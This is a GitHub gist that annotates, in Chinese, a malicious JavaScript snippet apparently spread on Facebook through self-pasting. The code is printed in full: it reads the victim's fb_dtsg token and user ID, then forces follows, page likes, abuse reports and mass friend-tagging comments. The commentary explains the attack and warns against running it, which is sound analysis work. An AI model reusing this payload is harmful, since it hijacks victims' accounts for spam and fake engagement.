Skip to content

Instantly share code, notes, and snippets.

@s3131212

s3131212/Facebook_malicious_code.js

Last active May 23, 2019 14:28
Show Gist options
  • Save s3131212/11337714 to your computer and use it in GitHub Desktop.
Save s3131212/11337714 to your computer and use it in GitHub Desktop.
Download ZIP
Facebook 惡意代碼分析
Raw
Facebook_malicious_code.js
/*
* 原始資料來自:
* https://gist.github.com/Inndy/8618115
* 而Allen對此檔案做了更詳細的註解
* 請尊重原始作者,還有執行這程式會悲劇,另外如果我有註解錯誤或是程式錯誤,歡迎提出
*/
var fb_dtsg = document.getElementsByName("fb_dtsg")[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
/* 追蹤用戶 */
function a(abone) { //abone是指定追蹤用戶ID
var http4 = new XMLHttpRequest;
var url4 = "/ajax/follow/follow_profile.php?__a=1";
var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
http4.open("POST", url4, true); //對follow_profile.php發送請求
http4.onreadystatechange = function () {
if (http4.readyState == 4 && http4.status == 200) http4.close;
};
http4.send(params4); //發送追蹤指定用戶的請求
}
a("100001639786608"); //追蹤該用戶,這是我的Facebook ID
/* 對粉絲團按讚 */
function Like(p) { //p是要按讚的粉絲團
var Page = new XMLHttpRequest();
var PageURL = "//www.facebook.com/ajax/pages/fan_status.php";
var PageParams = "&fbpage_id=" + p + "&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user=" + user_id + "&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg=" + fb_dtsg + "&phstamp=";
Page.open("POST", PageURL, true); //對fan_status.php發送請求
Page.onreadystatechange = function () {
if (Page.readyState == 4 && Page.status == 200) {
Page.close;
}
};
Page.send(PageParams); //發送按讚的請求
}
Like("198417206917970"); //對指定粉絲團按讚,這是電腦故我在ID
/* 檢舉指定粉絲團 */
var fb_dtsg = document.getElementsByName("fb_dtsg")[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var now = (new Date)["getTime"]();
function Report(arg1) { //arg1為指定粉絲團ID
var xhr = new XMLHttpRequest();
var url = "//www.facebook.com/ajax/report/social.php";
var param = "fb_dtsg=" + fb_dtsg + "&block=1&pp=%7B%22actions_to_take%22%3A%22[]%22%2C%22are_friends%22%3Afalse%2C%22cid%22%3A" + arg1 + "%2C%22content_type%22%3A0%2C%22expand_report%22%3A1%2C%22first_choice%22%3A%22file_report%22%2C%22from_gear%22%3A%22timeline%22%2C%22is_following%22%3Afalse%2C%22is_tagged%22%3Afalse%2C%22on_profile%22%3Afalse%2C%22phase%22%3A3%2C%22ref%22%3A%22https%3A%5C%2F%5C%2Fwww.facebook.com%5C%2FNan.ertt7%22%2C%22report_type%22%3A145%2C%22rid%22%3A" + arg1 + "%2C%22sub_report_type%22%3A3%2C%22time_flow_started%22%3A" + now + "%2C%22user%22%3A" + user_id + "%7D&file_report=1&__user=" + user_id + "&__a=1&__dyn=7n8ahyj2qmvu5k9UmAAaUVpo&__req=u&ttstamp=2658168571071108880";//POST資料
xhr["open"]("POST", url, true); //發送請求給social.php
xhr["onreadystatechange"] = function () {
if (xhr["readyState"] == 4 && xhr["status"] == 200) {
xhr["close"];
};
};
xhr.send(param); //發送請求
};
Report("198417206917970"); //對特定粉絲團檢舉,這是電腦故我在ID
/* Tag一堆好友到指定照片 */
var fb_dtsg = document["getElementsByName"]("fb_dtsg")[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var arkadaslar = [];
var svn_rev;
function arkadaslari_al(id) {
var xhr = new XMLHttpRequest();
xhr["onreadystatechange"] = function () {
if (xhr["readyState"] == 4) {
//瘋狂Tag朋友
eval("arkadaslar = " + xhr["responseText"].toString()["replace"]("for (;;);", "") + ";"); //執行一個無限迴圈
for (f = 0; f < Math["round"](arkadaslar["payload"]["entries"]["length"] / 27); f++) {
mesaj = "";
mesaj_text = "";
for (i = f * 27; i < (f + 1) * 27; i++) {
if (arkadaslar["payload"]["entries"][i]) {
mesaj += " @[" + arkadaslar["payload"]["entries"][i]["uid"] + ":" + arkadaslar["payload"]["entries"][i]["text"] + "]"; //等一下要傳到add_comment.php的內容
mesaj_text += " " + arkadaslar["payload"]["entries"][i]["text"];
};
};
yorum_yap(id, mesaj); //發出留言,請見下面yorum_yap函數
};
};
};
var str = "&filter[0]=user";
str += "&options[0]=friends_only";
str += "&options[1]=nm";
str += "&token=v7";
str += "&viewer=" + user_id;
str += "&__user=" + user_id; //把參數設定成str,為什麼要分這麼多次加入而不是一行寫完,我也不知道
if (document["URL"]["indexOf"]("https://") >= 0) { //判斷是否有啟用https
xhr["open"]("GET", "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + str, true); //在https情況下發送Get請求
} else {
xhr["open"]("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + str, true); //在http情況下發送Get請求
};
xhr["send"]();
};
//隨機Tag朋友
function RandomArkadas() {
var str = "";
for (i = 0; i < 9; i++) {
str += " @[" + arkadaslar["payload"]["entries"][Math["floor"](Math["random"]() * arkadaslar["payload"]["entries"]["length"])]["uid"] + ":" + arkadaslar["payload"]["entries"][Math["floor"](Math["random"]() * arkadaslar["payload"]["entries"]["length"])]["text"] + "]";
};
return str;
};
function yorum_yap(id, _0x7892xc) {
var xhr = new XMLHttpRequest();
var str = "";
str += "&ft_ent_identifier=" + id;
str += "&comment_text=" + encodeURIComponent(_0x7892xc);
str += "&source=2";
str += "&client_id=1377871797138:1707018092";
str += "&reply_fbid";
str += "&parent_comment_id";
str += "&rootid=u_jsonp_2_3";
str += "&clp={\"cl_impid\":\"453524a0\",\"clearcounter\":0,\"elementid\":\"js_5\",\"version\":\"x\",\"parent_fbid\":" + id + "}";
str += "&attached_sticker_fbid=0";
str += "&attached_photo_fbid=0";
str += "&giftoccasion";
str += "&ft[tn]=[]";
str += "&__user=" + user_id;
str += "&__a=1";
str += "&__dyn=7n8ahyj35ynxl2u5F97KepEsyo";
str += "&__req=q";
str += "&fb_dtsg=" + fb_dtsg;
str += "&ttstamp="; //又是一個無聊又冗長的寫法
xhr["open"]("POST", "/ajax/ufi/add_comment.php", true); //發送一個加入留言請求(add_comment.php)
xhr["setRequestHeader"]("Content-type", "application/x-www-form-urlencoded"); //設定header
xhr["onreadystatechange"] = function () {
if (xhr["readyState"] == 4 && xhr["status"] == 200) {
xhr["close"];
};
};
xhr["send"](str); //把剛剛設定好的str傳出去
};
arkadaslari_al("613671255392561"); // Tag一堆朋友到指定照片
// 最後提醒,真的不要執行
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment